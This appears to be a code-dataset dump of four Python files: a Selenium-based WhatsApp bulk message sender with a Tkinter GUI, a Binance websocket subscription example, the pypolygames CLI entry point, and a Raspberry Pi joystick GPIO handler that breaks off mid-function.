source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
main.py | import os
from tkinter import *
from tkinter import ttk
import PIL
from PIL import ImageTk, Image
from tkinter import filedialog
import time
import pandas as pd
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import threading
from tkinter import messagebox
# CLASSE PARA ENVIO DE MENSAGENS
class Automation():
def __init__(self):
print('Iniciando...')
def run(self, input_texto, checkBox_value, path):
self.texto = input_texto
self.ckb_value = checkBox_value
self.image_path = path
self.driver = webdriver.Chrome()
self.driver.get('https://web.whatsapp.com/')
time.sleep(10)
print(self.texto)
self.planilha_contatos()
# CARREGA A PLANILHA COM CONTATOS
def planilha_contatos(self):
self.tabela = pd.read_excel('contatos.xlsx', sheet_name='contatos')
self.buscar_contatos(self.tabela)
# PEGA NOME E CONTATO NA PLANILHA
def buscar_contatos(self, tabela):
self.maxcontatos = len(tabela.index)
for x in range(self.maxcontatos):
print(tabela.Nome[x], tabela.Numero[x])
self.whatsapp(tabela.Nome[x], tabela.Numero[x])
def whatsapp(self, nome, numero):
# ENVIA MENSAGEM DE TEXTO
texto = self.texto
link = f"https://web.whatsapp.com/send?phone={numero}&text={texto}"
self.driver.get(link)
time.sleep(4)
enviar_msg = self.driver.find_element_by_xpath('//*[@id="main"]/footer/div[1]/div/span[2]/div/div[2]/div[1]/div/div[2]')
enviar_msg.send_keys(Keys.ENTER)
time.sleep(2)
self.enviar_img()
def enviar_img(self):
if self.ckb_value == 1:
time.sleep(4)
self.driver.find_element_by_css_selector("span[data-icon='clip']").click()
attach = self.driver.find_element_by_css_selector("input[type='file']")
attach.send_keys(self.image_path)
time.sleep(1)
send = self.driver.find_element_by_xpath('//*[@id="app"]/div[1]/div[1]/div[2]/div[2]/span/div[1]/span/div[1]/div/div[2]/div/div[1]/div[3]/div/div/div[2]/div[1]/div[2]')
send.send_keys(Keys.ENTER)
time.sleep(2)
else:
pass
class Aplication():
def __init__(self):
self.root = Tk()
self.automatizar = Automation()
#FUNÇÕES
self.vars()
self.palette()
# COMPONENTES
self.window()
self.frames()
self.labels()
self.textbox()
self.buttons()
self.checkbox()
self.panel()
# LOOP
self.root.mainloop()
def vars(self):
# PATH
self.root_path = os.getcwd()
# GLOBAL
self.var_ckb1 = IntVar()
# SET IMAGE DEFAUT
self.image_path = Image.open('midia.png')
self.imagem_defaut = ImageTk.PhotoImage(self.image_path)
def palette(self):
self.text_color = '#D9D9D9'
self.textbox_color = '#d4d4d4'
self.buttons_color = '#d4d4d4'
self.checkbox_color = '#45475b'
self.label_color = '#45475b'
self.frame_color = '#45475b'
self.bg_color = '#282934'
def window(self):
self.root.title("WhatsAutomation")
self.root.geometry("400x680")
self.root.resizable(True, True)
self.root.maxsize(width=600, height=800)
self.root.minsize(width=300, height=500)
self.root.configure(background=self.bg_color)
self.root.wm_attributes("-topmost", True) #Keep first plan
def frames(self):
# TEXTBOX
self.frame_1 = Frame(self.root, bg=self.frame_color)
self.frame_1.place(relx=.02, rely=.02, relwidth=.96, relheight=.38)
# CHECKBOX | BOTÃO OPEN FILE
self.frame_2 = Frame(self.root, bg=self.frame_color)
self.frame_2.place(relx=.02, rely=.41, relwidth=.96, relheight=.06)
# IMG
self.frame_3 = Frame(self.root, bg=self.frame_color)
self.frame_3.place(relx=.02, rely=.482, relwidth=.96, relheight=.40)
# SEND IMAGE
self.frame_4 = Frame(self.root, bg=self.frame_color)
self.frame_4.place(relx=.02, rely=.895, relwidth=.96, relheight=.09)
def labels(self):
self.label_1 = Label(self.frame_1, text='Mensagem a ser enviada:', bg=self.label_color, fg=self.text_color)
self.label_1.place(relx=.3, rely=.03)
def textbox(self):
self.textbox_1 = Text(self.frame_1, height=9, width=37, bg=self.textbox_color, pady=10, padx=10, font='sans-serif')
self.textbox_1.place(relx=.04, rely=.14, relwidth=.92, relheight=.80)
def buttons(self):
self.button_1 = Button(self.frame_2, text='Open file', command=self.file_open, bg=self.buttons_color, state=DISABLED)
self.button_1.place(relx=.26, rely=.16, relwidth=.2, relheight=.7)
self.button_2 = Button(self.frame_4, text='ENVIAR', command=self.start)
self.button_2.place(relx=.338, rely=.30, relwidth=.3, relheight=.4)
def checkbox(self):
self.checkbox_1 = Checkbutton(self.frame_2, text='Imagem',onvalue=1, offvalue=0, variable=self.var_ckb1, command=self.func_checkbox1, bg=self.checkbox_color, activebackground=self.checkbox_color, activeforeground=self.text_color)
self.checkbox_1['fg'] = '#D9D9D9'
self.checkbox_1.place(relx=.50, rely=.16, relheight=.7)
def panel(self):
self.panel_1 = Label(self.frame_3, image=self.imagem_defaut, bg='#45475b', state= DISABLED, width=200, height=200)
self.panel_1.place(relx=.24, rely=.08, relwidth=.5, relheight=.84)
def func_checkbox1(self):
if (self.var_ckb1.get() == 1):
self.button_1.config(state=NORMAL)
self.panel_1.config(state=NORMAL)
self.checkbox_1.configure(selectcolor="green")
elif (self.var_ckb1.get() == 0):
self.button_1.config(state=DISABLED)
self.panel_1.config(state=DISABLED)
self.checkbox_1.configure(selectcolor="#D9D9D9")
else:
print('Valor Invalido')
def file_open(self):
try:
self.path=filedialog.askopenfilename(initialdir='C://')
self.new_image = ImageTk.PhotoImage(Image.open(self.path))
self.panel_1.configure(image=self.new_image)
except AttributeError:
print('Selecione uma imagem')
except PIL.UnidentifiedImageError:
print('Formato invalido')
def start(self):
messagebox.showinfo("Info","Abra o WahtsApp você tem 10s para escanear o codigo")
textbox_1_Value = self.textbox_1.get("1.0","end-1c")
checkBox_value = self.var_ckb1.get()
if checkBox_value == 1:
threading.Thread(target=self.automatizar.run, args=(textbox_1_Value, checkBox_value, self.path)).start()
else:
self.path = ' '
threading.Thread(target=self.automatizar.run, args=(textbox_1_Value, checkBox_value, self.path)).start()
if __name__ == '__main__':
app = Aplication() |
example_subscribe.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_subscribe.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://lucit-systems-and-development.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager")
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
#print(oldest_stream_data_from_stream_buffer)
pass
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com")
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
markets = ['bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
'neousdt', 'bnbusdt', 'adabtc', 'ethusdt', 'trxbtc', 'trxbtc', 'bchabcbtc', 'ltcbtc', 'xrpbtc',
'ontbtc', 'bttusdt', 'eosbtc', 'xlmbtc', 'bttbtc', 'tusdusdt', 'xlmusdt', 'qkcbtc', 'zrxbtc',
'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc']
channels = ['trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'depth5']
markets_1 = ['bnbbtc', 'ethbtc']
channels_1 = ['trade', 'kline_1m', '!ticker']
stream_id = binance_websocket_api_manager.create_stream(channels_1, markets_1)
binance_websocket_api_manager.unsubscribe_from_stream(stream_id=stream_id, markets="BNBBTC")
markets_2 = ['batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
'dashbtc', 'rvnbnb', 'bchabctusd', 'etcbtc', 'bnbeth', 'ethpax', 'nanobtc', 'xembtc']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_2)
markets_3 = ['!miniTicker']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_3)
markets_4 = ['engbtc', 'zileth', 'xlmeth', 'eosbnb', 'xrppax', 'lskbtc', 'npxsbtc', 'xmrusdt', 'ltcpax', 'xmrusdt',
'ethtusd', 'batusdt', 'mcobtc', 'neoeth', 'bntbtc', 'eostusd', 'lrcbtc', 'funbtc', 'zecusdt',
'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb',
'wanbnb', 'zrxbnb', 'agibnb', 'funeth', 'arketh', 'engeth']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_4)
time.sleep(1)
binance_websocket_api_manager.get_stream_subscriptions(stream_id)
time.sleep(2)
channels_2 = ['trade', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'depth5']
binance_websocket_api_manager.unsubscribe_from_stream(stream_id, channels=channels_2)
request_id = binance_websocket_api_manager.get_stream_subscriptions(stream_id)
while binance_websocket_api_manager.get_result_by_request_id(request_id) is False:
print("Wait to receive the result!")
time.sleep(0.5)
print(str(binance_websocket_api_manager.get_result_by_request_id(request_id)))
time.sleep(10)
while True:
#binance_websocket_api_manager.print_summary()
binance_websocket_api_manager.print_stream_info(stream_id)
#binance_websocket_api_manager.get_stream_subscriptions(stream_id)
time.sleep(1)
|
__main__.py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
from pathlib import Path
import sys
import warnings
import time
from dataclasses import astuple
import argparse
from multiprocessing import Process
from typing import Union, List
from .params import (
GameParams,
ModelParams,
OptimParams,
SimulationParams,
ExecutionParams,
EvalParams,
)
from .utils import CommandHistory
from .training import run_training
from .evaluation import run_evaluation
from .human import run_human_played_game
from .human import run_tp_played_game
from .convert import convert_checkpoint
from .draw_model import draw_model
DOC = """The python package `pypolygames` can be used in either of the following modes:
- `pypolygames train` (training mode): a game and a model (as well as several other options, see below) are chosen and the model is iteratively trained with MCTS
- `pypolygames eval` (evaluation mode): the model confronts either a pure MCTS or another neural network powered MCTS. The evaluation of a training can be done either offline (from checkpoints periodically saved) or in real time; in that case, the evaluation considers only the most recent checkpoint in order to follow closely the training, skipping some checkpoints in case the eval computation takes longer than the time becween consecutive checkpoints. It is displayed through visdom.
- `pypolygames traineval` (training + evaluation mode): it mixes the two previous modes and allow to launch one command instead of two. With the `real_time` option the modes can be launched in parallel instead of sequentially.
- `pypolygames human` (human mode): a human player plays against the machine
Trainings log the following relevant files in the `checkpoint_dir`:
- `model.pt`
- `train.log`
- `stat.tb`
- `checkpoints_<epoch>.pt` for for checkpoints saved each `saving_period` epoch (e.g., if `saving_period == 10`, `checkpoints_0.pt`, `checkpoints_9.pt`, `checkpoints_19.pt`, `checkpoints_29.pt`)
By default, the checkpoint_dir is exps/dev/game_<game_name>_model_<model_name>_feat_<featurization>_GMT_<YYYYMMDDHHMMSS>
This directory will be the `checkpoint_dir` directory used by evaluation to retrieve the checkpoints to perform eval computation."""
def _check_arg_consistency(args: argparse.Namespace) -> None:
# Most of the consistency is done in the `__post_init__` methods in the params class
if (
args.command_history.last_command_contains("pure_mcts")
and getattr(args, "game_name", None) is None
):
raise ValueError(
"In '--pure_mcts' the game must be specified with '--game_name'"
)
if args.command_history.last_command_contains("human"):
if (
getattr(args, "pure_mcts", None) is False
and getattr(args, "init_checkpoint", None) is None
):
raise ValueError(
"The human player need to play either a '--pure_mcts' "
"or a '--init_checkpoint' neural network powered MCTS"
)
if args.command_history.last_command_contains("device_opponent"):
if getattr(args, "checkpoint_opponent", None) is None:
raise ValueError(
"If the opponent is a pure MCTS player "
"('--checkpoint_opponent' not set), "
"all its computation will happen on CPU, "
"'--device_opponent' should not be set"
)
if args.command_history.last_command_contains(
"per_thread_batchsize"
) and args.command_history.last_command_contains("act_batchsize"):
raise ValueError(
"When '--per_thread_batchsize' is set, '--act_batchsize' is not used"
)
if getattr(args, "total_time", 0) is not None and getattr(args, "total_time", 0) > 0:
if args.command_history.last_command_contains("num_rollouts"):
raise ValueError(
"When a '--total_time' is set, "
"the '--num_rollouts' will adapt automatically and should not be set"
)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description=DOC, formatter_class=argparse.RawDescriptionHelpFormatter, allow_abbrev=False,
)
parser.set_defaults(func=run_training_and_evaluation_from_args_warning)
subparsers = parser.add_subparsers(
help="Modes to be chosen from: `python -m pypolygames MODE`"
)
# TRAINING
parser_train = subparsers.add_parser("train")
parser_train.set_defaults(func=run_training_from_args)
# EVALUATION
parser_eval = subparsers.add_parser("eval")
parser_eval.set_defaults(func=run_evaluation_from_args)
# TRAINING + EVALUATION
parser_traineval = subparsers.add_parser("traineval")
parser_traineval.set_defaults(func=run_training_and_evaluation_from_args)
# HUMAN-PLAYED GAME
parser_human = subparsers.add_parser("human")
parser_human.set_defaults(func=run_human_played_game_from_args)
# TEXT-PROTOCOLE GAME
parser_tp = subparsers.add_parser("tp")
parser_tp.set_defaults(func=run_tp_played_game_from_args)
# CONVERT CHECKPOINT COMMAND
parser_convert = subparsers.add_parser("convert")
parser_convert.set_defaults(func=convert_checkpoint_from_args)
parser_convert.add_argument('--out', type=str, required=True, help='File name to save the converted checkpoint to')
parser_convert.add_argument('--skip', type=str, nargs="*", help='List of attributes to not copy, leaving them initialized')
parser_convert.add_argument(
'--auto_tune_nnsize', action="store_true",
help='Tune nnsize automatically such that number of filters in hidden layers remains unchanged.'
)
parser_convert.add_argument(
'--zero_shot', type=bool, default=False,
help='Convert for zero-shot evaluation without training; this will initialise any skipped or new params to 0.'
)
parser_convert.add_argument(
'--move_source_channels', type=int, nargs="*",
help=('For fully convolutional architectures, for every channel in the destination game\'s move tensors, '
'specify the channel from the original tensor that we should transfer weights from.')
)
parser_convert.add_argument(
'--state_source_channels', type=int, nargs="*",
help=('For fully convolutional architectures, for every channel in the destination game\'s state tensors, '
'specify the channel from the original tensor that we should transfer weights from.')
)
# DRAW MODEL COMMAND
parser_draw_model = subparsers.add_parser("draw_model")
parser_draw_model.set_defaults(func=draw_model_from_args)
parser_draw_model.add_argument('--out', type=str, required=True, help='File name (without extension) to save figure to.')
# Game params
train_game_params_group = parser_train.add_argument_group(
"Game parameters",
"Not to be specified in case of loading a checkpoint or a pretrained model",
)
traineval_game_params_group = parser_traineval.add_argument_group(
"Game parameters",
"Not to be specified in case of loading a checkpoint or a pretrained model",
)
game_params_group = parser.add_argument_group(
"Game parameters",
"Not to be specified in case of loading a checkpoint or a pretrained model",
)
human_game_params_group = parser_human.add_argument_group(
"Game parameters",
"Mandatory for pure MTCS, "
"but not to be specified in case of loading a pretrained model",
)
for arg_name, arg_field in GameParams.arg_fields():
train_game_params_group.add_argument(arg_field.name, **arg_field.opts)
traineval_game_params_group.add_argument(arg_field.name, **arg_field.opts)
game_params_group.add_argument(
arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
)
human_game_params_group.add_argument(arg_field.name, **arg_field.opts)
parser_convert.add_argument(arg_field.name, **arg_field.opts)
parser_draw_model.add_argument(arg_field.name, **arg_field.opts)
# Model params
train_model_params_group = parser_train.add_argument_group(
"Model parameters",
"Not to be specified in case of loading a checkpoint or a pretrained model",
)
traineval_model_params_group = parser_traineval.add_argument_group(
"Model parameters",
"Not to be specified in case of loading a checkpoint or a pretrained model",
)
model_params_group = parser.add_argument_group("Model parameters")
human_model_params_group = parser_human.add_argument_group(
"Model parameters",
"The machine model can be either a '--pure_mcts' or "
"a '--init_checkpoint' neural network powered MCTS",
)
for arg_name, arg_field in ModelParams.arg_fields():
if arg_name != "pure_mcts":
train_model_params_group.add_argument(arg_field.name, **arg_field.opts)
traineval_model_params_group.add_argument(arg_field.name, **arg_field.opts)
model_params_group.add_argument(
arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
)
if arg_name in {"pure_mcts", "init_checkpoint"}:
human_model_params_group.add_argument(arg_field.name, **arg_field.opts)
if arg_name != "pure_mcts":
parser_convert.add_argument(arg_field.name, **arg_field.opts)
parser_draw_model.add_argument(arg_field.name, **arg_field.opts)
# Optimizer params
train_optim_params_group = parser_train.add_argument_group("Optimizer parameters")
traineval_optim_params_group = parser_traineval.add_argument_group(
"Optimizer parameters"
)
optim_params_group = parser.add_argument_group("Optimizer parameters")
for _, arg_field in OptimParams.arg_fields():
train_optim_params_group.add_argument(arg_field.name, **arg_field.opts)
traineval_optim_params_group.add_argument(arg_field.name, **arg_field.opts)
optim_params_group.add_argument(
arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
)
# Simulation params
train_simulation_params_group = parser_train.add_argument_group(
"Simulation parameters"
)
traineval_simulation_params_group = parser_traineval.add_argument_group(
"Simulation parameters"
)
simulation_params_group = parser.add_argument_group("Simulation parameters")
human_simulation_params_group = parser_human.add_argument_group(
"Simulation parameters"
)
for arg_name, arg_field in SimulationParams.arg_fields():
if arg_name not in {
"human_first",
"time_ratio",
"total_time",
}: # , "num_actor"}:
train_simulation_params_group.add_argument(arg_field.name, **arg_field.opts)
traineval_simulation_params_group.add_argument(
arg_field.name, **arg_field.opts
)
simulation_params_group.add_argument(
arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
)
#if arg_name in {"num_actor", "num_rollouts"}:
if True:
human_simulation_params_group.add_argument(arg_field.name, **arg_field.opts)
# Execution params
train_execution_params_group = parser_train.add_argument_group(
"Execution parameters"
)
traineval_execution_params_group = parser_traineval.add_argument_group(
"Execution parameters"
)
human_execution_params_group = parser_human.add_argument_group(
"Execution parameters"
)
execution_params_group = parser.add_argument_group("Execution parameters")
for arg_name, arg_field in ExecutionParams.arg_fields():
if arg_name not in {"human_first", "time_ratio", "total_time"}:
train_execution_params_group.add_argument(arg_field.name, **arg_field.opts)
traineval_execution_params_group.add_argument(
arg_field.name, **arg_field.opts
)
execution_params_group.add_argument(
arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
)
if arg_name in {"human_first", "time_ratio", "total_time", "device", "seed"}:
human_execution_params_group.add_argument(arg_field.name, **arg_field.opts)
# Evaluation params
eval_eval_params_group = parser_eval.add_argument_group("Evaluation parameters")
traineval_eval_params_group = parser_traineval.add_argument_group(
"Evaluation parameters"
)
eval_params_group = parser.add_argument_group("Evaluation parameters")
for arg_name, arg_field in EvalParams.arg_fields():
eval_eval_params_group.add_argument(arg_field.name, **arg_field.opts)
if arg_name not in {"checkpoint_dir", "checkpoint"}:
traineval_eval_params_group.add_argument(arg_field.name, **arg_field.opts)
eval_params_group.add_argument(
arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
)
args = parser.parse_args()
args.command_history = CommandHistory()
# check arg consistency
_check_arg_consistency(args)
return args
def _get_game_features(game_params: GameParams) -> str:
return "_".join(str(x) for x in astuple(game_params))
def _get_timestamp() -> str:
return time.strftime("%Y%m%d%H%M%S", time.gmtime())
def update_and_create_checkpoint_dir(
game_params: GameParams,
model_params: ModelParams,
execution_params: ExecutionParams,
) -> None:
# create a dedicated folder if none is provided
if execution_params.checkpoint_dir is None:
game_name = game_params.game_name
model_name = model_params.model_name
game_features = _get_game_features(game_params)
timestamp = _get_timestamp()
subfolder = f"game_{game_name}_model_{model_name}_feat_{game_features}_GMT_{timestamp}"
execution_params.checkpoint_dir = Path("exps").absolute() / "dev" / subfolder
execution_params.checkpoint_dir.mkdir(exist_ok=True, parents=True)
def instanciate_params_from_args(
Dataclass, args: argparse.Namespace
) -> Union[
GameParams, ModelParams, OptimParams, SimulationParams, ExecutionParams, EvalParams
]:
return Dataclass(
**{param: getattr(args, param, None) for param, _ in Dataclass.arg_fields()}
)
def run_training_from_args(args: argparse.Namespace):
command_history = args.command_history
game_params = instanciate_params_from_args(GameParams, args)
model_params = instanciate_params_from_args(ModelParams, args)
optim_params = instanciate_params_from_args(OptimParams, args)
simulation_params = instanciate_params_from_args(SimulationParams, args)
execution_params = instanciate_params_from_args(ExecutionParams, args)
update_and_create_checkpoint_dir(
game_params=game_params,
model_params=model_params,
execution_params=execution_params,
)
run_training(
command_history=command_history,
game_params=game_params,
model_params=model_params,
optim_params=optim_params,
simulation_params=simulation_params,
execution_params=execution_params,
)
def run_evaluation_from_args(args: argparse.Namespace):
eval_params = instanciate_params_from_args(EvalParams, args)
execution_params = instanciate_params_from_args(ExecutionParams, args)
run_evaluation(eval_params=eval_params, execution_params=execution_params)
def run_training_and_evaluation_from_args(args: argparse.Namespace):
command_history = args.command_history
game_params = instanciate_params_from_args(GameParams, args)
model_params = instanciate_params_from_args(ModelParams, args)
optim_params = instanciate_params_from_args(OptimParams, args)
simulation_params = instanciate_params_from_args(SimulationParams, args)
execution_params = instanciate_params_from_args(ExecutionParams, args)
# create the save dir
update_and_create_checkpoint_dir(
game_params=game_params,
model_params=model_params,
execution_params=execution_params,
)
args.checkpoint_dir = execution_params.checkpoint_dir
eval_params = instanciate_params_from_args(EvalParams, args)
if args.real_time:
eval_process = Process(target=run_evaluation, args=(eval_params,))
eval_process.start()
run_training(
command_history=command_history,
game_params=game_params,
model_params=model_params,
optim_params=optim_params,
simulation_params=simulation_params,
execution_params=execution_params,
)
eval_process.join()
else:
run_training(
command_history=command_history,
game_params=game_params,
model_params=model_params,
optim_params=optim_params,
simulation_params=simulation_params,
execution_params=execution_params,
)
run_evaluation(eval_params=eval_params, only_last=True)
def run_human_played_game_from_args(args: argparse.Namespace):
game_params = instanciate_params_from_args(GameParams, args)
model_params = instanciate_params_from_args(ModelParams, args)
simulation_params = instanciate_params_from_args(SimulationParams, args)
simulation_params.num_game = 1
execution_params = instanciate_params_from_args(ExecutionParams, args)
run_human_played_game(
game_params=game_params,
model_params=model_params,
simulation_params=simulation_params,
execution_params=execution_params,
)
def run_tp_played_game_from_args(args: argparse.Namespace):
game_params = instanciate_params_from_args(GameParams, args)
model_params = instanciate_params_from_args(ModelParams, args)
simulation_params = instanciate_params_from_args(SimulationParams, args)
simulation_params.num_game = 1
execution_params = instanciate_params_from_args(ExecutionParams, args)
run_tp_played_game(
game_params=game_params,
model_params=model_params,
simulation_params=simulation_params,
execution_params=execution_params,
)
def convert_checkpoint_from_args(args: argparse.Namespace):
command_history = args.command_history
game_params = instanciate_params_from_args(GameParams, args)
model_params = instanciate_params_from_args(ModelParams, args)
convert_checkpoint(
command_history=command_history,
game_params=game_params,
model_params=model_params,
out=args.out,
skip=args.skip,
auto_tune_nnsize=args.auto_tune_nnsize,
zero_shot=args.zero_shot,
move_source_channels=args.move_source_channels,
state_source_channels=args.state_source_channels,
)
def draw_model_from_args(args: argparse.Namespace):
game_params = instanciate_params_from_args(GameParams, args)
model_params = instanciate_params_from_args(ModelParams, args)
draw_model(
game_params=game_params,
model_params=model_params,
out=args.out,
)
def run_training_and_evaluation_from_args_warning(args: argparse.Namespace):
# pypolygames called directly
if len(sys.argv) == 1:
print(DOC)
# otherwise default to traineval
else:
warnings.warn(
"'pypolygames' called with arguments runs as 'pypolygames traineval'",
DeprecationWarning,
)
run_training_and_evaluation_from_args(args)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
JoystickHandler.py | #!/usr/bin/python3
import LogHandler
import os
import time
import threading
import sys
mylogger = LogHandler.LogHandler("joystick_handler")
myfolder = os.path.dirname(os.path.abspath(__file__))
# IMPORT IMPORTING GPIO LIB
try:
import RPi.GPIO as GPIO
except RuntimeError:
mylogger.logger.error("Error importing RPi.GPIO! This is probably because you need superuser privileges. You can achieve this by using 'sudo' to run your script")
def rpienv_source():
import subprocess
if not os.path.exists(str(myfolder) + '/.rpienv'):
print("[ ENV ERROR ] " + str(myfolder) + "/.rpienv path not exits!")
sys.exit(1)
command = ['bash', '-c', 'source ' + str(myfolder) + '/.rpienv -s && env']
proc = subprocess.Popen(command, stdout = subprocess.PIPE)
for line in proc.stdout:
if type(line) is bytes:
line = line.decode("utf-8")
try:
name = line.partition("=")[0]
value = line.partition("=")[2]
if type(value) is unicode:
value = value.encode('ascii','ignore')
value = value.rstrip()
os.environ[name] = value
except Exception as e:
if "name 'unicode' is not defined" != str(e):
print(e)
proc.communicate()
rpienv_source()
# IMPORT SAHERED SOCKET MEMORY FOR VIRTUAL BUTTONS
try:
clientmemdict_path = os.path.join(os.path.dirname(os.environ['CLIENTMEMDICT']))
sys.path.append( clientmemdict_path )
import clientMemDict
socketdict = clientMemDict.SocketDictClient()
except Exception as e:
socketdict = None
print("Socket client error: " + str(e))
# IMPORT HAPTIC ENGINE INTERFACE
try:
haptic_eng_bin_path = os.path.join(myfolder, "../../haptic_engine/bin/")
sys.path.append(haptic_eng_bin_path)
import hapticenginge_interface as hei
hei.hapt.set_channel_clean(False) # not clean haptic engine channel under button uses it!
except Exception as e:
print("Haptic engine import failed: " + str(e))
class JoystickHandler():
def __init__(self, up_pin, down_pin, right_pin, left_pin, center_pin, haptic=True, mode="BCM"):
self.channels_dict = {"UP": up_pin,\
"DOWN": down_pin,\
"RIGHT": right_pin,\
"LEFT": left_pin,\
"CENTER": center_pin}
self.haptic = haptic
# set gpio channels
if mode == "BOARD":
GPIO.setmode(GPIO.BOARD)
elif mode == "BCM":
GPIO.setmode(GPIO.BCM)
for key in self.channels_dict:
GPIO.setup(self.channels_dict[key], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
####################
self.threads = []
self.last_event_cmd = None
self.button_thrd_timing = 0.1
self.virtual_button_socketMemDict_watch_thrd_timing = 0.2
self.button_threads_init()
def button_threads_init(self):
self.threads.append(threading.Thread(target=self.up_button_thrd))
self.threads.append(threading.Thread(target=self.down_button_thrd))
self.threads.append(threading.Thread(target=self.left_button_thrd))
self.threads.append(threading.Thread(target=self.right_button_thrd))
self.threads.append(threading.Thread(target=self.center_button_thrd))
self.threads.append(threading.Thread(target=self.virtual_button_socketMemDict_watch_thrd))
# write more threads here...
for thd in self.threads:
thd.daemon = True # with this set, can stop therad
thd.start()
time.sleep(0.1)
# sleep a little while manage_pages_thread read contents
time.sleep(0.5)
def up_button_thrd(self):
while True:
channel = self.channels_dict["UP"]
if self.__button_event_get(channel, edge="up"):
self.last_event_cmd = "UP"
time.sleep(self.button_thrd_timing)
def down_button_thrd(self):
while True:
channel = self.channels_dict["DOWN"]
if self.__button_event_get(channel, edge="up"):
self.last_event_cmd = "DOWN"
time.sleep(self.button_thrd_timing)
def left_button_thrd(self):
while True:
channel = self.channels_dict["LEFT"]
if self.__button_event_get(channel, edge="up"):
self.last_event_cmd = "LEFT"
time.sleep(self.button_thrd_timing)
def right_button_thrd(self):
while True:
channel = self.channels_dict["RIGHT"]
if self.__button_event_get(channel, edge="up"):
self.last_event_cmd = "RIGHT"
time.sleep(self.button_thrd_timing)
def center_button_thrd(self):
while True:
channel = self.channels_dict["CENTER"]
if self.__button_event_get(channel, edge="up"):
self.last_event_cmd = "CENTER"
time.sleep(self.button_thrd_timing)
def virtual_button_socketMemDict_watch_thrd(self):
while True:
cmd = socketdict.get_parameter("oled", "joystick").rstrip().upper()
if cmd == "UP" or cmd == "DOWN" or cmd == "CENTER" or cmd == "RIGHT" or cmd == "LEFT":
self.last_event_cmd = cmd
time.sleep(0.5)
socketdict.set_parameter("oled", "joystick", "None")
time.sleep(self.virtual_button_socketMemDict_watch_thrd_timing)
def get_button_evenet(self, in_loop=True):
while in_loop:
if self.last_event_cmd is not None:
print("Button was pressed: " + str(self.last_event_cmd))
return_value = self.last_event_cmd
self.last_event_cmd = None
try:
if self.haptic:
hei.run_interface(option="tap")
except Exception as e:
print("Haptic engine call failed: " + str(e))
return return_value
time.sleep(0.08)
def simple_input_read(self, channel):
try:
while True:
state = GPIO.input(channel)
#print("Button raw input: " + str(state) + " channel: " + str(channel))
if state == 1:
return True
else:
return False
except KeyboardInterrupt:
return None
mylogger.logger.info("CTRL-C exit")
def __button_event_get(self, channel, edge="up"):
is_pressed = False
if edge == "down":
try:
state = self.simple_input_read(channel)
while state:
state = self.simple_input_read(channel)
time.sleep(0.08)
if not state:
is_pressed = True
mylogger.logger.info("Button was pressed")
if state is None:
break
return is_pressed
except KeyboardInterrupt:
